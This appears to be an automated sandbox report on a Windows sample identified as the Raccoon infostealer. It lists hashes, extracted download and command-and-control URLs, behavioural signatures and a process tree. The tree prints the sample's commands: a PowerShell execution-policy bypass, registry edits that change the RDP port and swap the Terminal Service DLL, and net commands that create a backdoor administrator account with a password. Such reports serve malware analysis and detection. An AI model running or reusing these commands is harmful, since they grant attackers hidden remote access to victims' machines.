Analysis
-
max time kernel
88s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
02-06-2021 18:08
Static task
static1
Behavioral task
behavioral1
Sample
f13060a6789449453b7d4a4b815cc80d.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
f13060a6789449453b7d4a4b815cc80d.exe
Resource
win10v20210410
General
-
Target
f13060a6789449453b7d4a4b815cc80d.exe
-
Size
567KB
-
MD5
f13060a6789449453b7d4a4b815cc80d
-
SHA1
77d3b0a202710d93c660aca624a63a97811b8f9e
-
SHA256
2b9b67b6e376ed8db68a8b219209981c865a2a26a4c4cd926b79cf2fddb57d54
-
SHA512
78ed128be390ff896fb83b4cac8b30db20258f985d8f86d61f64da19cbd0bd8e2891a46fbdee1ad09e6d99fda697dfb12650deb1c628979b3a4133c438313b55
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 3872 powershell.exe 23 3872 powershell.exe 24 3872 powershell.exe 25 3872 powershell.exe 27 3872 powershell.exe 29 3872 powershell.exe 31 3872 powershell.exe 33 3872 powershell.exe 35 3872 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
ZyKUG6PQzM.exepid process 2128 ZyKUG6PQzM.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 3 IoCs
Processes:
f13060a6789449453b7d4a4b815cc80d.exepid process 4048 f13060a6789449453b7d4a4b815cc80d.exe 3636 3636 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI799A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79EC.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2g55yrqt.z5h.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79BB.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79CB.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nehj2dc3.eot.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI79FC.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3408 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 2984 powershell.exe 2984 powershell.exe 2984 powershell.exe 3936 powershell.exe 3936 powershell.exe 3936 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 3872 powershell.exe 3872 powershell.exe 3872 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeIncreaseQuotaPrivilege 2416 powershell.exe Token: SeSecurityPrivilege 2416 powershell.exe Token: SeTakeOwnershipPrivilege 2416 powershell.exe Token: SeLoadDriverPrivilege 2416 powershell.exe Token: SeSystemProfilePrivilege 2416 powershell.exe Token: SeSystemtimePrivilege 2416 powershell.exe Token: SeProfSingleProcessPrivilege 2416 powershell.exe Token: SeIncBasePriorityPrivilege 2416 powershell.exe Token: SeCreatePagefilePrivilege 2416 powershell.exe Token: SeBackupPrivilege 2416 powershell.exe Token: SeRestorePrivilege 2416 powershell.exe Token: SeShutdownPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeSystemEnvironmentPrivilege 2416 powershell.exe Token: SeRemoteShutdownPrivilege 2416 powershell.exe Token: SeUndockPrivilege 2416 powershell.exe Token: SeManageVolumePrivilege 2416 powershell.exe Token: 33 2416 powershell.exe Token: 34 2416 powershell.exe Token: 35 2416 powershell.exe Token: 36 2416 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeIncreaseQuotaPrivilege 2984 powershell.exe Token: SeSecurityPrivilege 2984 powershell.exe Token: SeTakeOwnershipPrivilege 2984 powershell.exe Token: SeLoadDriverPrivilege 2984 powershell.exe Token: SeSystemProfilePrivilege 2984 powershell.exe Token: SeSystemtimePrivilege 2984 powershell.exe Token: SeProfSingleProcessPrivilege 2984 powershell.exe Token: SeIncBasePriorityPrivilege 2984 powershell.exe Token: SeCreatePagefilePrivilege 2984 powershell.exe Token: SeBackupPrivilege 2984 powershell.exe Token: SeRestorePrivilege 2984 powershell.exe Token: SeShutdownPrivilege 2984 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeSystemEnvironmentPrivilege 2984 powershell.exe Token: SeRemoteShutdownPrivilege 2984 powershell.exe Token: SeUndockPrivilege 2984 powershell.exe Token: SeManageVolumePrivilege 2984 powershell.exe Token: 33 2984 powershell.exe Token: 34 2984 powershell.exe Token: 35 2984 powershell.exe Token: 36 2984 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeIncreaseQuotaPrivilege 3936 powershell.exe Token: SeSecurityPrivilege 3936 powershell.exe Token: SeTakeOwnershipPrivilege 3936 powershell.exe Token: SeLoadDriverPrivilege 3936 powershell.exe Token: SeSystemProfilePrivilege 3936 powershell.exe Token: SeSystemtimePrivilege 3936 powershell.exe Token: SeProfSingleProcessPrivilege 3936 powershell.exe Token: SeIncBasePriorityPrivilege 3936 powershell.exe Token: SeCreatePagefilePrivilege 3936 powershell.exe Token: SeBackupPrivilege 3936 powershell.exe Token: SeRestorePrivilege 3936 powershell.exe Token: SeShutdownPrivilege 3936 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeSystemEnvironmentPrivilege 3936 powershell.exe Token: SeRemoteShutdownPrivilege 3936 powershell.exe Token: SeUndockPrivilege 3936 powershell.exe Token: SeManageVolumePrivilege 3936 powershell.exe Token: 33 3936 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f13060a6789449453b7d4a4b815cc80d.execmd.exeZyKUG6PQzM.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4048 wrote to memory of 2128 4048 f13060a6789449453b7d4a4b815cc80d.exe ZyKUG6PQzM.exe PID 4048 wrote to memory of 2128 4048 f13060a6789449453b7d4a4b815cc80d.exe ZyKUG6PQzM.exe PID 4048 wrote to memory of 3744 4048 f13060a6789449453b7d4a4b815cc80d.exe cmd.exe PID 4048 wrote to memory of 3744 4048 f13060a6789449453b7d4a4b815cc80d.exe cmd.exe PID 4048 wrote to memory of 3744 4048 f13060a6789449453b7d4a4b815cc80d.exe cmd.exe PID 3744 wrote to memory of 3408 3744 cmd.exe timeout.exe PID 3744 wrote to memory of 3408 3744 cmd.exe timeout.exe PID 3744 wrote to memory of 3408 3744 cmd.exe timeout.exe PID 2128 wrote to memory of 2168 2128 ZyKUG6PQzM.exe powershell.exe PID 2128 wrote to memory of 2168 2128 ZyKUG6PQzM.exe powershell.exe PID 2168 wrote to memory of 3340 2168 powershell.exe csc.exe PID 2168 wrote to memory of 3340 2168 powershell.exe csc.exe PID 3340 wrote to memory of 1596 3340 csc.exe cvtres.exe PID 3340 wrote to memory of 1596 3340 csc.exe cvtres.exe PID 2168 wrote to memory of 2416 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 2416 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 2984 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 2984 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 3936 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 3936 2168 powershell.exe powershell.exe PID 2168 wrote to memory of 2932 2168 powershell.exe reg.exe PID 2168 wrote to memory of 2932 2168 powershell.exe reg.exe PID 2168 wrote to memory of 3652 2168 powershell.exe reg.exe PID 2168 wrote to memory of 3652 2168 powershell.exe reg.exe PID 2168 wrote to memory of 3868 2168 powershell.exe reg.exe PID 2168 wrote to memory of 3868 2168 powershell.exe reg.exe PID 2168 wrote to memory of 3904 2168 powershell.exe net.exe PID 2168 wrote to memory of 3904 2168 powershell.exe net.exe PID 3904 wrote to memory of 3872 3904 net.exe net1.exe PID 3904 wrote to memory of 3872 3904 net.exe net1.exe PID 2168 wrote to memory of 1632 2168 powershell.exe cmd.exe PID 2168 wrote to memory of 1632 2168 powershell.exe cmd.exe PID 1632 wrote to memory of 1564 1632 cmd.exe cmd.exe PID 1632 wrote to memory of 1564 1632 cmd.exe cmd.exe PID 1564 wrote to memory of 3960 1564 cmd.exe net.exe PID 1564 wrote to memory of 3960 1564 cmd.exe net.exe PID 3960 wrote to memory of 2388 3960 net.exe net1.exe PID 3960 wrote to memory of 2388 3960 net.exe net1.exe PID 2168 wrote to memory of 4012 2168 powershell.exe cmd.exe PID 2168 wrote to memory of 4012 2168 powershell.exe cmd.exe PID 4012 wrote to memory of 1512 4012 cmd.exe cmd.exe PID 4012 wrote to memory of 1512 4012 cmd.exe cmd.exe PID 1512 wrote to memory of 3936 1512 cmd.exe net.exe PID 1512 wrote to memory of 3936 1512 cmd.exe net.exe PID 3936 wrote to memory of 1328 3936 net.exe net1.exe PID 3936 wrote to memory of 1328 3936 net.exe net1.exe PID 3896 wrote to memory of 3640 3896 cmd.exe net.exe PID 3896 wrote to memory of 3640 3896 cmd.exe net.exe PID 3640 wrote to memory of 1644 3640 net.exe net1.exe PID 3640 wrote to memory of 1644 3640 net.exe net1.exe PID 2024 wrote to memory of 1084 2024 cmd.exe net.exe PID 2024 wrote to memory of 1084 2024 cmd.exe net.exe PID 1084 wrote to memory of 3864 1084 net.exe net1.exe PID 1084 wrote to memory of 3864 1084 net.exe net1.exe PID 2408 wrote to memory of 3344 2408 cmd.exe net.exe PID 2408 wrote to memory of 3344 2408 cmd.exe net.exe PID 3344 wrote to memory of 3960 3344 net.exe net1.exe PID 3344 wrote to memory of 3960 3344 net.exe net1.exe PID 912 wrote to memory of 4076 912 cmd.exe net.exe PID 912 wrote to memory of 4076 912 cmd.exe net.exe PID 4076 wrote to memory of 184 4076 net.exe net1.exe PID 4076 wrote to memory of 184 4076 net.exe net1.exe PID 2864 wrote to memory of 3960 2864 cmd.exe net.exe PID 2864 wrote to memory of 3960 2864 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4339.tmp" "c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kYvjN912 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc kYvjN912 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc kYvjN912 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc kYvjN9121⤵
-
